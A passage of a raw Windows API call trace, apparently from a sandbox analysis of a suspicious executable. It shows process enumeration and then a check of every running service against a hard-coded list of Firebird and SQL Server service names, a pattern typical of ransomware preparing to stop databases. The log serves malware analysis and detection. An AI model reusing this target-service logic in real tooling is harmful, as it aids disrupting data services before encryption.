cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.969] lstrlenW (lpString="svchost.exe") returned 11 [0164.969] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3bc, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0164.970] lstrlenW (lpString="msoia.exe") returned 9 [0164.970] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0164.971] lstrlenW (lpString="taskhostw.exe") returned 13 [0164.971] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x9c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0164.972] lstrlenW (lpString="explorer.exe") returned 12 [0164.972] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0164.973] lstrlenW (lpString="SearchUI.exe") returned 12 [0164.973] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0164.974] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0164.974] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0164.974] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0164.974] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0164.975] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0164.975] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x9d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0164.976] lstrlenW (lpString="hgaibc.exe") returned 10 [0164.976] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0165.020] lstrlenW (lpString="cmd.exe") returned 7 [0165.021] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xe40, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0165.021] lstrlenW (lpString="conhost.exe") returned 11 [0165.021] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xed8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xe40, pcPriClassBase=8, dwFlags=0x0, szExeFile="mode.com")) returned 1 [0165.022] lstrlenW (lpString="mode.com") returned 8 [0165.022] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xed8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xe40, pcPriClassBase=8, dwFlags=0x0, szExeFile="mode.com")) returned 0 [0165.023] CloseHandle (hObject=0x52c) returned 1 [0165.023] Sleep (dwMilliseconds=0x1f4) [0165.725] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x458c240 [0165.725] EnumServicesStatusExW (in: hSCManager=0x458c240, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0) returned 0 [0165.726] GetLastError () returned 0xea [0165.726] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c30) returned 0x46a4f50 [0165.726] EnumServicesStatusExW (in: hSCManager=0x458c240, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x46a4f50, cbBufSize=0x1c30, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x46a4f50, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0) returned 1 [0165.726] CloseServiceHandle (hSCObject=0x458c240) returned 1 [0165.727] lstrlenW (lpString="Appinfo") returned 7 [0165.727] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0165.727] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0165.727] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0165.727] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0165.727] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0165.727] lstrlenW (lpString="AppXSvc") returned 7 [0165.727] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0165.727] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0165.727] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0165.727] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0165.727] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0165.727] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0165.727] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0165.727] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0165.727] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0165.727] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0165.727] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0165.727] lstrlenW (lpString="Audiosrv") returned 8 [0165.728] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0165.728] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0165.728] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0165.728] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0165.728] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0165.728] lstrlenW (lpString="BFE") returned 3 [0165.728] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0165.728] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0165.728] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0165.728] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0165.728] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0165.728] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0165.728] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0165.728] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0165.728] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0165.728] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0165.728] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0165.728] lstrlenW (lpString="CDPSvc") returned 6 [0165.728] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0165.728] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0165.728] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0165.728] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0165.728] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0165.728] lstrlenW (lpString="ClickToRunSvc") returned 13 [0165.728] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0165.728] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0165.728] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0165.728] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0165.729] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0165.729] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0165.729] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0165.729] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0165.729] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0165.729] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0165.729] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0165.729] lstrlenW (lpString="CryptSvc") returned 8 [0165.729] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0165.729] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0165.729] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0165.729] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0165.729] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0165.729] lstrlenW (lpString="DcomLaunch") returned 10 [0165.729] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0165.729] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0165.729] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0165.729] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0165.729] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0165.729] lstrlenW (lpString="DeviceAssociationService") returned 24 [0165.729] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0165.729] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0165.729] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0165.729] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0165.729] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0165.729] lstrlenW (lpString="Dhcp") returned 4 [0165.729] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0165.730] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0165.730] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0165.730] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0165.730] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0165.730] lstrlenW (lpString="Dnscache") returned 8 [0165.730] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0165.730] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0165.730] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0165.730] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0165.730] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0165.730] lstrlenW (lpString="DPS") returned 3 [0165.730] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0165.730] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0165.730] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0165.730] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0165.730] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0165.730] lstrlenW (lpString="DusmSvc") returned 7 [0165.730] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0165.730] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0165.730] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0165.730] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0165.730] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0165.730] lstrlenW (lpString="EventLog") returned 8 [0165.730] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0165.730] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0165.730] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0165.730] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0165.730] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0165.730] lstrlenW (lpString="EventSystem") returned 11 [0165.731] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0165.731] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0165.731] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0165.731] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0165.731] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0165.731] lstrlenW (lpString="FontCache") returned 9 [0165.731] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0165.731] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0165.731] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0165.731] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0165.731] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0165.731] lstrlenW (lpString="gpsvc") returned 5 [0165.731] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0165.731] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0165.731] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0165.731] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0165.731] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0165.731] lstrlenW (lpString="iphlpsvc") returned 8 [0165.731] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0165.731] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0165.731] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0165.731] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0165.731] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0165.731] lstrlenW (lpString="KeyIso") returned 6 [0165.731] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0165.731] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0165.731] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0165.731] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0165.731] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0165.731] lstrlenW (lpString="LanmanServer") returned 12 [0165.731] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0165.732] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0165.732] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0165.732] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0165.732] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0165.732] lstrlenW (lpString="LanmanWorkstation") returned 17 [0165.732] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0165.732] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0165.732] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0165.732] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0165.732] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0165.732] lstrlenW (lpString="lfsvc") returned 5 [0165.732] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0165.732] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0165.732] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0165.732] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0165.732] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0165.732] lstrlenW (lpString="lmhosts") returned 7 [0165.732] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0165.732] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0165.732] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0165.732] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0165.732] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0165.732] lstrlenW (lpString="LSM") returned 3 [0165.732] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0165.732] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0165.732] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0165.732] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0165.732] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0165.732] lstrlenW (lpString="MpsSvc") returned 6 [0165.903] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0165.903] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0165.903] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0165.903] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0165.903] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0165.903] lstrlenW (lpString="NcbService") returned 10 [0165.903] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0165.903] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0165.903] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0165.903] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0165.903] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0165.903] lstrlenW (lpString="netprofm") returned 8 [0165.903] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0165.903] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0165.903] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0165.903] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0165.903] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0165.903] lstrlenW (lpString="NgcSvc") returned 6 [0165.903] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0165.903] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0165.903] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0165.903] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0165.903] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0165.903] lstrlenW (lpString="NlaSvc") returned 6 [0165.903] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0165.903] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0165.903] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0165.903] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0165.904] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0165.904] lstrlenW (lpString="nsi") returned 3 [0165.904] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0165.904] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0165.904] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0165.904] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0165.904] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0165.904] lstrlenW (lpString="PcaSvc") returned 6 [0165.904] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0165.904] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0165.904] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0165.904] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0165.904] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0165.904] lstrlenW (lpString="PlugPlay") returned 8 [0165.904] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0165.904] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0165.904] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0165.904] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0165.904] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0165.904] lstrlenW (lpString="Power") returned 5 [0165.904] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0165.904] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0165.904] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0165.904] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0165.904] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0165.904] lstrlenW (lpString="ProfSvc") returned 7 [0165.904] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0165.904] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0165.905] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0165.905] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0165.905] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0165.905] lstrlenW (lpString="RpcEptMapper") returned 12 [0165.905] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0165.905] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0165.905] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0165.905] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0165.905] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0165.905] lstrlenW (lpString="RpcSs") returned 5 [0165.905] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0165.905] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0165.905] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0165.905] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0165.905] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0165.905] lstrlenW (lpString="SamSs") returned 5 [0165.905] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0165.905] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0165.905] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0165.905] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0165.905] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0165.905] lstrlenW (lpString="Schedule") returned 8 [0165.905] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0165.906] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0165.906] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0165.906] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0165.906] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0165.906] lstrlenW (lpString="SecurityHealthService") returned 21 [0165.906] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0165.906] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0165.906] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0165.906] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0165.906] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0165.906] lstrlenW (lpString="SENS") returned 4 [0165.906] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0165.906] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0165.906] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0165.906] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0165.906] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0165.906] lstrlenW (lpString="ShellHWDetection") returned 16 [0165.906] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0165.906] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", 